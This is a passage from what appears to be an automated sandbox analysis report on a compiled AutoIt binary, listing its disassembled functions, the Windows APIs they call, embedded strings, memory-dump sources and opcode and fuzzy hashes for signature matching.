                                                                                                                                                                      • Opcode Fuzzy Hash: 795b7da6ba34959ebbca841e49e9add5cffb77d3ec7438f8c34aecf48db4ef05
                                                                                                                                                                      • Instruction Fuzzy Hash: EEF03A3B540612AFDB131B64FD889EA7B3EAF45302F010932FA02951A1DB755801CA50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0037410D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003AD5EC
                                                                                                                                                                        • Part of subcall function 00377D2C: _memmove.LIBCMT ref: 00377D66
                                                                                                                                                                      • _memset.LIBCMT ref: 0037418D
                                                                                                                                                                      • _wcscpy.LIBCMT ref: 003741E1
                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003741F1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                                                                      • String ID: Line:
                                                                                                                                                                      • API String ID: 3942752672-1585850449
                                                                                                                                                                      • Opcode ID: a1fdc0ee0d3d480160d2f2f9db9f7dbad456d076f867b2f87fb6a702ee726981
                                                                                                                                                                      • Instruction ID: b074fc1c370a8ee7d8555a98fc517c6e2938e77959b955f9ba5188013cb65288
                                                                                                                                                                      • Opcode Fuzzy Hash: a1fdc0ee0d3d480160d2f2f9db9f7dbad456d076f867b2f87fb6a702ee726981
                                                                                                                                                                      • Instruction Fuzzy Hash: 1831D171408305AAD733FB60DC46BDB77ECAF45300F11C92EF589960A2EB78A648C796
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C7652, Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003C758C,80070057,?,?,?,003C799D), ref: 003C766F
                                                                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003C758C,80070057,?,?), ref: 003C768A
                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003C758C,80070057,?,?), ref: 003C7698
                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003C758C,80070057,?), ref: 003C76A8
                                                                                                                                                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003C758C,80070057,?,?), ref: 003C76B4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3897988419-0
                                                                                                                                                                      • Opcode ID: d8a78cd444f5d55792ea0f5908b23fc477c750180cb3b1e12e3adfe79f4861b0
                                                                                                                                                                      • Instruction ID: 8ae205f34a3f928428b16ccd05f43ddd988a1a8f13acca9f18d91f10009427a7
                                                                                                                                                                      • Opcode Fuzzy Hash: d8a78cd444f5d55792ea0f5908b23fc477c750180cb3b1e12e3adfe79f4861b0
                                                                                                                                                                      • Instruction Fuzzy Hash: 07017176601604AFDB125F58DC48FAA7BADEF44791F140038FD08D2211EB31DD50DBA0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003769CA, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00374F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00374F6F
                                                                                                                                                                      • _free.LIBCMT ref: 003AE68C
                                                                                                                                                                      • _free.LIBCMT ref: 003AE6D3
                                                                                                                                                                        • Part of subcall function 00376BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00376D0D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                                                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                                                                      • API String ID: 2861923089-1757145024
                                                                                                                                                                      • Opcode ID: 9ffd4506e2f774c743408766285ba8d265dfe5dc855c6e40546d9726be8ef1ae
                                                                                                                                                                      • Instruction ID: a2ef4726f22b549905aa46414491c3ed4a0a1e48c2e280a340d78f49e8aa4f99
                                                                                                                                                                      • Opcode Fuzzy Hash: 9ffd4506e2f774c743408766285ba8d265dfe5dc855c6e40546d9726be8ef1ae
                                                                                                                                                                      • Instruction Fuzzy Hash: 2E917171910219DFCF16EFA4D8919EDB7B8FF1A310F14842AF815AB2A1EB349D04CB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003735B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,003735A1,SwapMouseButtons,00000004,?), ref: 003735D4
                                                                                                                                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,003735A1,SwapMouseButtons,00000004,?,?,?,?,00372754), ref: 003735F5
                                                                                                                                                                      • RegCloseKey.KERNEL32(00000000,?,?,003735A1,SwapMouseButtons,00000004,?,?,?,?,00372754), ref: 00373617
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                      • String ID: Control Panel\Mouse
                                                                                                                                                                      • API String ID: 3677997916-824357125
                                                                                                                                                                      • Opcode ID: 29be90d54d9304139266e237d5ad10846480c479fb324acf0e59bc9a26479424
                                                                                                                                                                      • Instruction ID: 638b5be27846a6ba54bb0a8652f920970c7885a79e4b7a1480905b806b292fe2
                                                                                                                                                                      • Opcode Fuzzy Hash: 29be90d54d9304139266e237d5ad10846480c479fb324acf0e59bc9a26479424
                                                                                                                                                                      • Instruction Fuzzy Hash: 85114571615218BFDB229F64DC80EBEBBBCEF04740F118469E809D7210E6759E40ABA0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C76C5, Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2ec4b43dcef73f933d038fba2a25f2b68e02f0b52871593abaeed20d6793546b
                                                                                                                                                                      • Instruction ID: 9e74d0fc20aa0f65f7e484504b23f5ec9378cc58c15785b7ee19ba86c977efde
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ec4b43dcef73f933d038fba2a25f2b68e02f0b52871593abaeed20d6793546b
                                                                                                                                                                      • Instruction Fuzzy Hash: 5FC12975A0421AEFCB15CF94C884EAEBBB9FF48714B15859DE806EB251D730ED81CB90
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E83A8, Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 003E83D8
                                                                                                                                                                      • CoUninitialize.OLE32 ref: 003E83E3
                                                                                                                                                                        • Part of subcall function 003CDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003CDAC5
                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 003E83EE
                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 003E86BF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 780911581-0
                                                                                                                                                                      • Opcode ID: 1c2491f41b278521b90b887985c3a0d302e88fd115111f3c38831677176e0375
                                                                                                                                                                      • Instruction ID: 00dc9156c1d472285c68898c02293e4f1d886c47e908d306d915b907e08b86f4
                                                                                                                                                                      • Opcode Fuzzy Hash: 1c2491f41b278521b90b887985c3a0d302e88fd115111f3c38831677176e0375
                                                                                                                                                                      • Instruction Fuzzy Hash: 0EA148756047519FDB12DF15C481B2AB7E8BF89324F058659FA9A9B3E1CB34ED00CB42
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D97E5, Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00375045: _fseek.LIBCMT ref: 0037505D
                                                                                                                                                                        • Part of subcall function 003D99BE: _wcscmp.LIBCMT ref: 003D9AAE
                                                                                                                                                                        • Part of subcall function 003D99BE: _wcscmp.LIBCMT ref: 003D9AC1
                                                                                                                                                                      • _free.LIBCMT ref: 003D992C
                                                                                                                                                                      • _free.LIBCMT ref: 003D9933
                                                                                                                                                                      • _free.LIBCMT ref: 003D999E
                                                                                                                                                                        • Part of subcall function 00392F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00399C64,00000000,00398D6D,003959D3,?), ref: 00392FA9
                                                                                                                                                                        • Part of subcall function 00392F95: GetLastError.KERNEL32(00000000,?,00399C64,00000000,00398D6D,003959D3,?), ref: 00392FBB
                                                                                                                                                                      • _free.LIBCMT ref: 003D99A6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1552873950-0
                                                                                                                                                                      • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                                                                                                                                      • Instruction ID: 65ce3cd4d807743fc07a589475dfe543a8683f0020c7d85b84a7828b7a35a8e7
                                                                                                                                                                      • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                                                                                                                                      • Instruction Fuzzy Hash: 2C5159B1904218AFDF259F64DC81B9EBBB9EF48310F0044AEB609AB341DB755E80CF58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00390BD0, Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __setmode.LIBCMT ref: 00390BF2
                                                                                                                                                                        • Part of subcall function 00375B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003D7B20,?,?,00000000), ref: 00375B8C
                                                                                                                                                                        • Part of subcall function 00375B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003D7B20,?,?,00000000,?,?), ref: 00375BB0
                                                                                                                                                                      • _fprintf.LIBCMT ref: 00390C29
                                                                                                                                                                      • OutputDebugStringW.KERNEL32(?), ref: 003C6331
                                                                                                                                                                        • Part of subcall function 00394CDA: _flsall.LIBCMT ref: 00394CF3
                                                                                                                                                                      • __setmode.LIBCMT ref: 00390C5E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 521402451-0
                                                                                                                                                                      • Opcode ID: e6183d3118f8598859951423bd250151f845b23bfd34a77fa5ceeed81bc167ad
                                                                                                                                                                      • Instruction ID: 934f720143f9b1457de5649e98920b70841d2cda232f92dbf101412b85ef612f
                                                                                                                                                                      • Opcode Fuzzy Hash: e6183d3118f8598859951423bd250151f845b23bfd34a77fa5ceeed81bc167ad
                                                                                                                                                                      • Instruction Fuzzy Hash: 0A11F0329042087EDF1BB3B4AC82EBE7B6D9F45320F14412AF2089F292DF645D4287A5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00374531, Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 00374560
                                                                                                                                                                        • Part of subcall function 0037410D: _memset.LIBCMT ref: 0037418D
                                                                                                                                                                        • Part of subcall function 0037410D: _wcscpy.LIBCMT ref: 003741E1
                                                                                                                                                                        • Part of subcall function 0037410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003741F1
                                                                                                                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 003745B5
                                                                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003745C4
                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003AD6CE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1378193009-0
                                                                                                                                                                      • Opcode ID: ab19591c4d25401b5fc605125b976ef7055c1b560d216856e9e074b5f773391c
                                                                                                                                                                      • Instruction ID: c31bcc123e4d059dfb00087c751b81f42b513d3ace80d9ac63e0f02ff7f84966
                                                                                                                                                                      • Opcode Fuzzy Hash: ab19591c4d25401b5fc605125b976ef7055c1b560d216856e9e074b5f773391c
                                                                                                                                                                      • Instruction Fuzzy Hash: 4921F970904784AFEB339B24DC49BE7BBECDF02314F04409DE69E56251C7746A84CB51
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00374DD0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                      • String ID: AU3!P/@$EA06
                                                                                                                                                                      • API String ID: 4104443479-1427125956
                                                                                                                                                                      • Opcode ID: 8d9c7449ff2d1f3db5a9907a4ba919bbc8430c567002d421ed0e31bfb3120dda
                                                                                                                                                                      • Instruction ID: 107a1e58216f79966da1871beb0cf03a87768945a570a809f205f360a2a952fd
                                                                                                                                                                      • Opcode Fuzzy Hash: 8d9c7449ff2d1f3db5a9907a4ba919bbc8430c567002d421ed0e31bfb3120dda
                                                                                                                                                                      • Instruction Fuzzy Hash: F441AF31A045589BDF374B6488517BE7FA9AF05320F29C065FC8A9FA82C76DAD40D3E1
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003773E5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 003AEE62
                                                                                                                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 003AEEAC
                                                                                                                                                                        • Part of subcall function 003748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003748A1,?,?,003737C0,?), ref: 003748CE
                                                                                                                                                                        • Part of subcall function 003909D5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 003909F4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                                                                      • String ID: X
                                                                                                                                                                      • API String ID: 3777226403-3081909835
                                                                                                                                                                      • Opcode ID: f6f32bc39fb0fcfb5b10931ed846ad352260853306d7f03a9b2b75cfcdd1c686
                                                                                                                                                                      • Instruction ID: c6700d8305927b8681dc36473bdbcbf99421defb3b12eaaf7e981d125a193938
                                                                                                                                                                      • Opcode Fuzzy Hash: f6f32bc39fb0fcfb5b10931ed846ad352260853306d7f03a9b2b75cfcdd1c686
                                                                                                                                                                      • Instruction Fuzzy Hash: ED21D571A002589BCF52DF94C845BEE7BFC9F49300F00805AE408EB241DBB85989CFA5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003743DB, Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 00374401
                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 003744A6
                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 003744C3
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IconNotifyShell_$_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1505330794-0
                                                                                                                                                                      • Opcode ID: 41eefdd4021d10c7505db227fbc54df3423dd057b8ee2ad36bd8b2d8994b9f41
                                                                                                                                                                      • Instruction ID: 55153e2cbb95ca636af108727dae0aa533ecfb1aff7e0d287266ce9bac93f480
                                                                                                                                                                      • Opcode Fuzzy Hash: 41eefdd4021d10c7505db227fbc54df3423dd057b8ee2ad36bd8b2d8994b9f41
                                                                                                                                                                      • Instruction Fuzzy Hash: F331A0B05043019FC732EF25D884697BBE8FB49304F01493EE99E87250D775A944DB52
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0039594C, Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __FF_MSGBANNER.LIBCMT ref: 00395963
                                                                                                                                                                        • Part of subcall function 0039A3AB: __NMSG_WRITE.LIBCMT ref: 0039A3D2
                                                                                                                                                                        • Part of subcall function 0039A3AB: __NMSG_WRITE.LIBCMT ref: 0039A3DC
                                                                                                                                                                      • __NMSG_WRITE.LIBCMT ref: 0039596A
                                                                                                                                                                        • Part of subcall function 0039A408: GetModuleFileNameW.KERNEL32(00000000,004343BA,00000104,?,00000001,00391013), ref: 0039A49A
                                                                                                                                                                        • Part of subcall function 0039A408: ___crtMessageBoxW.LIBCMT ref: 0039A548
                                                                                                                                                                        • Part of subcall function 003932DF: ___crtCorExitProcess.LIBCMT ref: 003932E5
                                                                                                                                                                        • Part of subcall function 003932DF: ExitProcess.KERNEL32 ref: 003932EE
                                                                                                                                                                        • Part of subcall function 00398D68: __getptd_noexit.LIBCMT ref: 00398D68
                                                                                                                                                                      • RtlAllocateHeap.NTDLL(01190000,00000000,00000001,?,?,?,?,00391013,?,0000FFFF), ref: 0039598F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1372826849-0
                                                                                                                                                                      • Opcode ID: f5be401811f9995da063f9a0e07acfdc110c4f7974eb189ebbcadb36eb77b056
                                                                                                                                                                      • Instruction ID: 0bb66b59a1c0aac66fac01d45542754d0b798e2f7448b876ffafeab4deee3bd6
                                                                                                                                                                      • Opcode Fuzzy Hash: f5be401811f9995da063f9a0e07acfdc110c4f7974eb189ebbcadb36eb77b056
                                                                                                                                                                      • Instruction Fuzzy Hash: DB019236201A16EEFE233B65D842A6E72489F82774F12012AF505AE2C1DB709D818765
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D8F97, Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _free.LIBCMT ref: 003D8FA5
                                                                                                                                                                        • Part of subcall function 00392F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00399C64,00000000,00398D6D,003959D3,?), ref: 00392FA9
                                                                                                                                                                        • Part of subcall function 00392F95: GetLastError.KERNEL32(00000000,?,00399C64,00000000,00398D6D,003959D3,?), ref: 00392FBB
                                                                                                                                                                      • _free.LIBCMT ref: 003D8FB6
                                                                                                                                                                      • _free.LIBCMT ref: 003D8FC8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
